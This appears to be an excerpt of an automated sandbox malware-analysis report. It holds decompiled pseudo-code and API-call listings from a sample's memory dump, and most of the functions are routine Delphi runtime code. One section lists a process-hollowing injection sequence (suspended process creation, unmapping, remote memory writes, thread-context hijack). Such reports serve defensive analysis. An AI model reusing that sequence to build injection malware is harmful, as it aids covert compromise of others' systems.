    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
